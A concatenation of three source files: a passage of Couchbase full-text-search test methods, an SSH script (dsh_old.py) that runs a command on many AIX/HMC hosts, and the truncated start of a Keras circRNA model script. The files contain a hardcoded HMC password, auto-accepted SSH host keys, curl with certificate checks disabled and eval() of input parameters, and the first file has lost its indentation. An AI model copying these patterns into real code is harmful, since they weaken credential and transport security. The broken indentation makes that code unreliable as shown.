_, _, _, query_norm1, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 1 = %s" % query_norm1)
_, _, _, query_norm2, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 2 = %s" % query_norm2)
_, _, _, query_norm3, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 3 = %s" % query_norm3)
self.assertTrue(query_norm1 == query_norm2 == query_norm3,
"Testcase failed. Query Normalization score for "
"Doc1 != Doc2 != Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_coord_score(self):
"""
Test if the Coord score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, _, _, coord1 = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 1 = %s" % coord1)
_, _, _, _, coord2 = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 2 = %s" % coord2)
self.assertTrue(coord1 < coord2,
"Testcase failed. Coord score for Doc1 not < Doc2")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_fuzzy_query(self):
"""
Test if fuzzy queries work fine
"""
test_data = [{"text":"simmer"},
{"text":"dimmer"},
{"text":"hammer"},
{"text":"shimmer"},
{"text":"rubber"},
{"text":"jabber"},
{"text":"kilmer"},
{"text":"year"},
{"text":"mumma"},
{"text":"tool stemmer"},
{"text":"he is weak at grammar"},
{"text":"sum of all the rows"}]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, content, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Docs in Search results = %s" % content)
self.log.info("Expected Docs = %s" % self.expected_docs)
if hits>0:
all_expected_docs_present = True
for doc in self.expected_docs_list:
all_expected_docs_present &= index.is_doc_present_in_query_result_content(content, doc)
self.assertTrue(all_expected_docs_present, "All expected docs not in search results")
def test_pagination_of_search_results(self):
max_matches = self._input.param("query_max_matches", 10000000)
show_results_from_item = self._input.param("show_results_from_item", 0)
self.load_data()
self.wait_till_items_in_bucket_equal(items = self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match_all": "true", "field":"name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
sort_params = self.build_sort_params()
for index in self._cb_cluster.get_indexes():
hits, doc_ids, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
show_results_from_item=show_results_from_item)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % doc_ids)
if hits:
self.log.info("Count of docs on page = %s" % len(doc_ids))
                    if 0 <= show_results_from_item <= self._num_items:
items_on_page = self._num_items - show_results_from_item
elif show_results_from_item < 0:
items_on_page = self._num_items
show_results_from_item = 0
else:
items_on_page = 0
expected_items_on_page = min(items_on_page, max_matches)
self.assertEqual(len(doc_ids), expected_items_on_page, "Items per page are not correct")
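                    # emp docs are keyed sequentially (emp10000001, emp10000002, ...),
                    # so the exact ids expected on this page follow from the offset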
doc_id_prefix='emp'
first_doc_id = 10000001
i = 0
expected_doc_present = True
while i < expected_items_on_page:
expected_doc_id = doc_id_prefix+str(first_doc_id+i+show_results_from_item)
expected_doc_present &= (expected_doc_id in doc_ids)
if not expected_doc_present:
self.log.info("Doc ID %s not in the search results page" % expected_doc_id)
i += 1
self.assertTrue(expected_doc_present, "Some docs not present in the results page")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_snippets_highlighting_of_search_term_in_results(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping("name", "text")
index.add_child_field_to_default_mapping("manages.reports", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
n1ql_results = None
if self.run_via_n1ql:
n1ql_query = "select b, search_meta(b.oouutt) as meta from default b where " \
"search(b, {\"query\": " + json.dumps(
query) + ", \"explain\": true, \"highlight\": {}},{\"out\": \"oouutt\"})"
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
highlight=True,
highlight_style=self.highlight_style,
highlight_fields=self.highlight_fields_list)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
self.expected_results = json.loads(self.expected_results)
if hits:
for expected_doc in self.expected_results:
result &= index.validate_snippet_highlighting_in_result_content(
contents, expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if self.run_via_n1ql:
result &= index.validate_snippet_highlighting_in_result_content_n1ql(
n1ql_results['results'], expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_geo_query(self):
"""
Tests both geo location and bounding box queries
compares results against ES
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
self.generate_random_geo_queries(geo_index, self.num_queries)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(geo_index, n1ql_executor=n1ql_executor)
def test_geo_polygon_query(self):
"""
Tests both geo polygon queries
compares results against ES
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
self.generate_random_geo_polygon_queries(geo_index, self.num_queries, self.polygon_feature, self.num_vertices)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(geo_index, n1ql_executor=n1ql_executor)
def test_geo_polygon_on_edge_corner_query(self):
expected_hits = int(self._input.param("expected_hits", 0))
expected_doc_ids = self._input.param("expected_doc_ids", None)
polygon_points = str(self._input.param("polygon_points", None))
geo_index = self.create_geo_index_and_load()
query = '{"field": "geo", "polygon_points" : ' + polygon_points + '}'
self.log.info(query)
query = json.loads(query)
contents = ""
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
for doc_id in expected_doc_ids.split(","):
doc_exist = False
for content in contents:
if content['id'] == doc_id:
self.log.info(content)
doc_exist = True
if not doc_exist:
self.fail("expected doc_id : " + str(doc_id) + " does not exist")
def test_geo_polygon_with_holes_must_not(self):
geo_index = self.create_geo_index_and_load()
query = '{"must": {"conjuncts": [{"field": "geo", "polygon_points": ' \
'[[-124.29807832031247, 38.01868304390075], ' \
'[-122.34800507812497, 37.12617594722073], [-120.52976777343747, 38.35114759945404], ' \
'[-120.72752167968747, 39.44978110907268], [-122.90834850139811, 40.22582625155702], ' \
'[-124.24868053264811, 39.61072953444142]]}]}, ' \
'"must_not": {"disjuncts": [{"field": "geo", "polygon_points": ' \
'[[-122.56773164062497, 39.72703407666045], ' \
'[-123.02915742187497, 38.96238669420149], [-122.07334687499997, 38.189396892659744], ' \
'[-120.79893281249997, 38.585519836298694]]}]}}'
self.log.info(query)
query = json.loads(query)
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=False,
expected_hits=18,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
def test_sort_geo_query(self):
"""
Generate random geo location queries and compare the results against
Elasticsearch
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
from .random_query_generator.rand_query_gen import FTSESQueryGenerator
testcase_failed = False
for i in range(self.num_queries):
self.log.info("Running Query no --> " + str(i))
fts_query, es_query = FTSESQueryGenerator.construct_geo_location_query()
            self.log.info(fts_query)
            self.log.info("fts_query location ---> " + str(fts_query["location"]))
# If query has geo co-ordinates in form of an object
if "lon" in fts_query["location"]:
lon = fts_query["location"]["lon"]
lat = fts_query["location"]["lat"]
# If query has geo co-ordinates in form of a list
elif isinstance(fts_query["location"], list):
lon = fts_query["location"][0]
lat = fts_query["location"][1]
# If query has geo co-ordinates in form of a string or geohash
elif isinstance(fts_query["location"], str):
# If the location is in string format
if "," in fts_query["location"]:
lat = float(fts_query["location"].split(",")[0])
lon = float(fts_query["location"].split(",")[1])
else:
lat = float(Geohash.decode(fts_query["location"])[0])
lon = float (Geohash.decode(fts_query["location"])[1])
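            # the FTS distance string ends with a two-character unit
            # (e.g. "10mi" -> "mi"), reused below for both the FTS sort_fields
            # and the ES _geo_distance sort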
unit = fts_query["distance"][-2:]
location = None
case = random.randint(0, 3)
# Geo location as an object
if case == 0:
location = {"lon": lon,
"lat": lat}
# Geo Location as array
if case == 1:
location = [lon, lat]
# Geo Location as string
if case == 2:
location = "{0},{1}".format(lat, lon)
# Geo Location as Geohash
if case == 3:
geohash = Geohash.encode(lat, lon, precision=random.randint(3, 8))
location = geohash
print(("sort_fields_location ----> " + str(location)))
sort_fields = [
{
"by": "geo_distance",
"field": "geo",
"unit": unit,
"location": location
}
]
hits, doc_ids, _, _ = geo_index.execute_query(
query=fts_query,
sort_fields=sort_fields)
self.log.info("Hits from FTS: {0}".format(hits))
self.log.info("First 50 docIDs: {0}". format(doc_ids[:50]))
sort_fields_es = [
{
"_geo_distance": {
"geo": location,
"order": "asc",
"unit": unit
}
}
]
es_query["sort"] = sort_fields_es
hits2, doc_ids2, _ = self.es.search(index_name="es_index",
query=es_query)
self.log.info("Hits from ES: {0}".format(hits2))
self.log.info("First 50 doc_ids: {0}".format(doc_ids2[:50]))
if doc_ids==doc_ids2:
self.log.info("PASS: Sort order matches!")
else:
msg = "FAIL: Sort order mismatch!"
self.log.error(msg)
testcase_failed = True
self.log.info("--------------------------------------------------"
"--------------------------------------------------")
if testcase_failed:
self.fail(msg)
def test_xattr_support(self):
"""
Tests if setting includeXAttrs in index definition
breaks anything
:return: Nothing
"""
self.load_data()
index = self._cb_cluster.create_fts_index(
name='default_index',
source_name='default',
source_params={"includeXAttrs": True})
self.is_index_partitioned_balanced(index)
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def test_ssl(self):
"""
Tests if we are able to create an index and query over ssl port
:return: Nothing
"""
fts_ssl_port=18094
import json, subprocess
idx = {"sourceName": "default",
"sourceType": "couchbase",
"type": "fulltext-index"}
qry = {"indexName": "default_index_1",
"query": {"field": "type", "match": "emp"},
"size": 10000000}
self.load_data()
cert = RestConnection(self._master).get_cluster_ceritificate()
f = open('cert.pem', 'w')
f.write(cert)
f.close()
fts_node = self._cb_cluster.get_random_fts_node()
cmd = "curl -g -k "+\
"-XPUT -H \"Content-Type: application/json\" "+\
"-u Administrator:password "+\
"https://{0}:{1}/api/index/default_idx -d ".\
format(fts_node.ip, fts_ssl_port) +\
"\'{0}\'".format(json.dumps(idx))
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
if json.loads(output)["status"] == "ok":
query = "curl -g -k " + \
"-XPOST -H \"Content-Type: application/json\" " + \
"-u Administrator:password " + \
"https://{0}:18094/api/index/default_idx/query -d ". \
format(fts_node.ip, fts_ssl_port) + \
"\'{0}\'".format(json.dumps(qry))
self.sleep(20, "wait for indexing to complete")
output = subprocess.check_output(query, shell=True)
self.log.info("Hits: {0}".format(json.loads(output)["total_hits"]))
if int(json.loads(output)["total_hits"]) != 1000:
self.fail("Query over ssl failed!")
else:
self.fail("Index could not be created over ssl")
def test_json_types(self):
import couchbase
self.load_data()
self.create_simple_default_index()
master = self._cb_cluster.get_master_node()
dic ={}
dic['null'] = None
dic['number'] = 12345
dic['date'] = "2018-01-21T18:25:43-05:00"
dic['bool'] = True
dic['string'] = "sample string json"
dic['array'] = ['element1', 1234, True]
try:
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
cluster = Cluster('couchbase://{0}'.format(master.ip))
authenticator = PasswordAuthenticator('Administrator', 'password')
cluster.authenticate(authenticator)
cb = cluster.open_bucket('default')
for key, value in list(dic.items()):
cb.upsert(key, value)
except Exception as e:
self.fail(e)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, 5, self.query_types)
self.run_query_and_compare(index)
# This test is to validate if the value for score is 0 for all docs when score=none is specified in the search query.
def test_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items // 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
if hits == expected_hits:
for doc in contents:
# Check if the score of the doc is 0.
if "score" in doc:
self.assertEqual(doc["score"], 0, "Score is not 0 for doc {0}".format(doc["id"]))
else:
self.fail("Score key not present in search results for doc {0}".format(doc["id"]))
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
else:
self.fail("No. of hits not matching expected hits. Hits = {0}, Expected Hits = {1}".format(hits,
expected_hits))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
# This test checks the correctness of search results from queries with score=none and without score=none.
def test_result_correctness_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items // 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, doc_ids_with_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_with_score_none)
doc_ids_with_score_none.sort()
hits, doc_ids_without_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False)
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_without_score_none)
doc_ids_without_score_none.sort()
self.assertListEqual(doc_ids_with_score_none, doc_ids_without_score_none, "Doc Ids not equal")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
# Tests the ASCII folding filter with different types of accented characters
def test_ascii_folding_filter(self):
# Reference for test data : http://www.jarte.com/help_new/accent_marks_diacriticals_and_special_characters.html
test_data = [
{"text": "Ápple"},
{"text": "Àpple"},
{"text": "Äpple"},
{"text": "Âpple"},
{"text": "Ãpple"},
{"text": "Åpple"},
{"text": "ápple"},
{"text": "àpple"},
{"text": "äpple"},
{"text": "âpple"},
{"text": "ãpple"},
{"text": "åpple"},
{"text": "Ðodge"},
{"text": "ðodge"},
{"text": "Élephant"},
{"text": "élephant"},
{"text": "Èlephant"},
{"text": "èlephant"},
{"text": "Ëlephant"},
{"text": "ëlephant"},
{"text": "Êlephant"},
{"text": "êlephant"},
{"text": "Íceland"},
{"text": "íceland"},
{"text": "Ìceland"},
{"text": "ìceland"},
{"text": "Ïceland"},
{"text": "ïceland"},
{"text": "Îceland"},
{"text": "îceland"},
{"text": "Órange"},
{"text": "órange"},
{"text": "Òrange"},
{"text": "òrange"},
{"text": "Örange"},
{"text": "örange"},
{"text": "Ôrange"},
{"text": "ôrange"},
{"text": "Õrange"},
{"text": "õrange"},
{"text": "Ørange"},
{"text": "ørange"},
{"text": "Únicorn"},
{"text": "únicorn"},
{"text": "Ùnicorn"},
{"text": "ùnicorn"},
{"text": "Ünicorn"},
{"text": "ünicorn"},
{"text": "Ûnicorn"},
{"text": "ûnicorn"},
{"text": "Ýellowstone"},
{"text": "ýellowstone"},
{"text": "Ÿellowstone"},
{"text": "ÿellowstone"},
{"text": "Ñocturnal"},
{"text": "ñocturnal"},
{"text": "Çelcius"},
{"text": "çelcius"},
{"text": "Œlcius"},
{"text": "œlcius"},
{"text": "Šmall"},
{"text": "šmall"},
{"text": "Žebra"},
{"text": "žebra"},
{"text": "Æsthetic"},
{"text": "æsthetic"},
{"text": "Þhonetic"},
{"text": "þhonetic"},
{"text": "Discuß"},
{"text": "ÆꜴ"}
]
search_terms = [
{"term": "apple", "expected_hits": 6},
{"term": "Apple", "expected_hits": 6},
{"term": "dodge", "expected_hits": 1},
{"term": "Dodge", "expected_hits": 1},
{"term": "Elephant", "expected_hits": 4},
{"term": "elephant", "expected_hits": 4},
{"term": "iceland", "expected_hits": 4},
{"term": "Iceland", "expected_hits": 4},
{"term": "orange", "expected_hits": 6},
{"term": "Orange", "expected_hits": 6},
{"term": "unicorn", "expected_hits": 4},
{"term": "Unicorn", "expected_hits": 4},
{"term": "yellowstone", "expected_hits": 2},
{"term": "Yellowstone", "expected_hits": 2},
{"term": "nocturnal", "expected_hits": 1},
{"term": "Nocturnal", "expected_hits": 1},
{"term": "celcius", "expected_hits": 1},
{"term": "Celcius", "expected_hits": 1},
{"term": "oelcius", "expected_hits": 1},
{"term": "OElcius", "expected_hits": 1},
{"term": "small", "expected_hits": 1},
{"term": "Small", "expected_hits": 1},
{"term": "zebra", "expected_hits": 1},
{"term": "Zebra", "expected_hits": 1},
{"term": "aesthetic", "expected_hits": 1},
{"term": "AEsthetic", "expected_hits": 1},
{"term": "thhonetic", "expected_hits": 1},
{"term": "THhonetic", "expected_hits": 1},
{"term": "Discuss", "expected_hits": 1},
{"term": "AEAO", "expected_hits": 1}
]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
# Update index to have the child field "text"
index.add_child_field_to_default_mapping("text", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
# Update index to have a custom analyzer which uses the ascii folding filter as a char filter
index.index_definition["params"]["mapping"]["analysis"] = {}
index.index_definition["params"]["mapping"]["analysis"] = json.loads(
"{\"analyzers\": {\"asciiff\": {\"char_filters\": [\"asciifolding\"],\"tokenizer\": \"letter\",\"type\": \"custom\" }}}")
index.index_definition["params"]["mapping"]["default_analyzer"] = "asciiff"
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.wait_for_indexing_complete()
# Run queries
try:
for index in self._cb_cluster.get_indexes():
all_queries_passed = True
failed_search_terms = []
for search_term in search_terms:
self.log.info("=============== Querying for term {0} ===============".format(search_term["term"]))
query = {'match': search_term["term"], 'field': 'text'}
expected_hits = search_term["expected_hits"]
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
if hits != expected_hits:
all_queries_passed = False
failed_search_terms.append(search_term["term"])
self.assertTrue(all_queries_passed,
"All search terms did not return expected results. Terms for which queries failed : {0}".format(
str(failed_search_terms)))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_snowball_stemmer_token_filter(self):
        # Test data: inflected word forms in several languages (hu, da, fr, en, it, es, de) that share a common stem
all_test_data = {
"generic": [
{"text": "This is something else 1"},
{"text": "This is something else 2"},
{"text": "This is other indtadfgadad"},
{"text": "This is not that"}
],
"test_hu_data": [
{"text": "This is babakocsi"},
{"text": "This is babakocsijáért"},
{"text": "This is babakocsit"},
{"text": "This is babakocsiért"}
],
"test_da_data": [
{"text": "This is indtage"},
{"text": "This is indtagelse"},
{"text": "This is indtager"},
{"text": "This is indtages"},
{"text": "This is indtaget"}
],
"test_fr_data": [
{"text": "This is continu"},
{"text": "This is continua"},
{"text": "This is continuait"},
{"text": "This is continuant"},
{"text": "This is continuation"}
],
"test_en_data": [
{"text": "This is enjoying"},
{"text": "This is enjoys"},
{"text": "This is enjoy"},
{"text": "This is enjoyed"},
{"text": "This is enjoyments"}
],
"test_it_data": [
{"text": "This is abbandonata"},
{"text": "This is abbandonate"},
{"text": "This is abbandonati"},
{"text": "This is abbandonato"},
{"text": "This is abbandonava"}
],
"test_es_data": [
{"text": "This is torá"},
{"text": "This is toreado"},
{"text": "This is toreándolo"},
{"text": "This is toreara"},
{"text": "This is torear"}
],
"test_de_data": [
{"text": "This is aufeinanderfolge"},
{"text": "This is aufeinanderfolgen"},
{"text": "This is aufeinanderfolgend"},
{"text": "This is aufeinanderfolgende"},
{"text": "This is aufeinanderfolgenden"}
]
}
all_search_terms = {
"search_hu_terms": [
{"term": "babakocs", "expected_hits": 4}
],
"search_da_terms": [
{"term": "indtag", "expected_hits": 5}
],
"search_fr_terms": [
{"term": "continu", "expected_hits": 5}
],
"search_en_terms": [
{"term": "enjoy", "expected_hits": 5}
],
"search_it_terms": [
{"term": "abbandon", "expected_hits": 5}
],
"search_es_terms": [
{"term": "tor", "expected_hits": 5}
],
"search_de_terms": [
{"term": "aufeinanderfolg", "expected_hits": 5}
]
}
test_data = all_test_data[self._input.param("test_data", "test_da_data")] + all_test_data["generic"]
search_terms = all_search_terms[self._input.param("search_terms", "search_da_terms")]
token_filter = self._input.param("token_filter", "stemmer_da_snowball")
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
# Update index to have the child field "text"
index.add_child_field_to_default_mapping("text", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
        # Update index to have a custom analyzer which uses the snowball stemmer token filter
index.index_definition["params"]["mapping"]["analysis"] = {}
index.index_definition["params"]["mapping"]["analysis"] = json.loads(
"{\"analyzers\": {\"customAnalyzer1\": {\"token_filters\": [\"" + token_filter + "\"],\"tokenizer\": \"whitespace\",\"type\": \"custom\" }}}")
index.index_definition["params"]["mapping"]["default_analyzer"] = "customAnalyzer1"
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.wait_for_indexing_complete()
# Run queries
try:
for index in self._cb_cluster.get_indexes():
all_queries_passed = True
failed_search_terms = []
for search_term in search_terms:
self.log.info("=============== Querying for term {0} ===============".format(search_term["term"]))
query = {'match': search_term["term"], 'field': 'text'}
expected_hits = search_term["expected_hits"]
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
if hits != expected_hits:
all_queries_passed = False
failed_search_terms.append(search_term["term"])
self.assertTrue(all_queries_passed,
"All search terms did not return expected results. Terms for which queries failed : {0}".format(
str(failed_search_terms)))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
|
dsh_old.py
|
import paramiko
import sys
import datetime
import threading
import logging
"""
Edit this line and add your command
"""
#cmd2run = "for f in $(ioscli lsdev -type adapter | grep fcs | grep 8Gb | awk {'print $1'}); do wwpn=$(ioscli lsdev -dev $f -vpd | grep Network | sed s'/\.//g;s/Network Address//g;s/ //g');echo $f,$wwpn; done"
cmd2run = "echo \"lslpp -l | grep -i bes\" | oem_setup_env"
sys.tracebacklimit = 0
if len(sys.argv) < 2:
    logging.error("Not enough arguments. Usage: dsh_old.py <host> [<host> ...]")
    sys.exit(1)
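# Example invocation (hypothetical host names): every positional argument is treated as a
# host to connect to, and the login user is chosen from the host name, e.g.
#   python dsh_old.py vsa01 hmc01 aixhost01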
current_date = datetime.date.today()
results = []
def run_dsh(ip):
    # Each worker thread creates its own SSH client so concurrent connections do not share state.
    ssh = paramiko.SSHClient()
    ssh.load_system_host_keys()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # Pick the login user from the host name convention (vsa*, hmc*, everything else).
        if "vsa" in ip:
            ssh.connect(hostname=ip, port=22, username='padmin', timeout=5)
        elif "hmc" in ip:
            ssh.connect(hostname=ip, port=22, username='hscroot', password="start1234", timeout=5)
        else:
            ssh.connect(hostname=ip, port=22, username='ibmadmin', timeout=5)
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd2run)
        for line in ssh_stdout.readlines():
            if len(line) > 0:
                results.append([ip, line])
    except Exception as err:
        print("[+] Unable to get info from " + str(ip) + ": " + str(err))
    finally:
        ssh.close()
threads = []
for x in sys.argv[1:]:
if x:
t = threading.Thread(target=run_dsh, args=(x,))
threads.append(t)
for i in threads:
    i.start()
for i in threads:
    i.join()
print("\n------------------------------------------------------\n")
for line in results:
if line:
print(str(line[0]).rstrip('\n') + ": " + str(line[1]).rstrip('\n'))
print("\n------------------------------------------------------\n")
|
circDeep.py
|
import keras
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Dense, Dropout, Merge, Input
from keras.callbacks import ModelCheckpoint, EarlyStopping
from sklearn import metrics
from keras import optimizers
from gensim.models import Word2Vec
from gensim.models.word2vec import LineSentence
from keras.layers import Input, Embedding, LSTM, Convolution1D
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from keras.layers import MaxPooling1D, AveragePooling1D, Bidirectional
from keras.layers.advanced_activations import PReLU
from keras.layers.normalization import BatchNormalization
from sklearn.externals import joblib
import gensim, logging
import multiprocessing
import random
from keras.utils import np_utils, generic_utils
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers import merge, Dropout, Flatten, Dense, Permute
from keras.models import Model, Sequential
import matplotlib.pyplot as plt
from sklearn.preprocessing import LabelEncoder
import os
import pysam
from collections import defaultdict
import argparse
import timeit
import re
import pyBigWig
import tempfile
import sys
import hashlib
from multiprocessing import Process
import pickle
import numpy as np
from keras.models import load_model
from keras.layers import Concatenate
def suffle_text(file_input, file_output):
f = open(file_input)
oo = open(file_output, 'w')
entire_file = f.read()
file_list = entire_file.split('\n')
num_lines = len(file_list)
    random_nums = random.sample(range(num_lines), num_lines)
for i in random_nums:
oo.write(file_list[i] + "\n")
oo.close()
f.close()
def seq2ngram(seqs, k, s, dest, wv):
f = open(seqs)
lines = f.readlines()
f.close()
list22 = []
print('need to n-gram %d lines' % len(lines))
f = open(dest, 'w')
for num, line in enumerate(lines):
if num < 200000:
line = line[:-1].lower() # remove '\n' and lower ACGT
l = len(line) # length of line
list2 = []
for i in range(0, l, s):
if i + k >= l + 1:
break
list2.append(line[i:i + k])
f.write(''.join(line[i:i + k]))
f.write(' ')
f.write('\n')
list22.append(convert_data_to_index(list2, wv))
f.close()
return list22
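# Example of the n-gram expansion above (hypothetical input): with k=3 and s=1 the line
# "ACGTAC" is lower-cased and written out as "acg cgt gta tac ", i.e. overlapping k-mers
# taken with stride s; the returned list holds the word2vec vocabulary indices of those
# k-mers (k-mers missing from the vocabulary are skipped by convert_data_to_index).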
def convert_sequences_to_index(list_of_sequences, wv):
    ll = []
    for i in range(len(list_of_sequences)):
        ll.append(convert_data_to_index(list_of_sequences[i], wv))
    return ll
def convert_data_to_index(string_data, wv):
index_data = []
for word in string_data:
if word in wv:
index_data.append(wv.vocab[word].index)
return index_data
def seq2ngram2(seqs, k, s, dest):
f = open(seqs)
lines = f.readlines()
f.close()
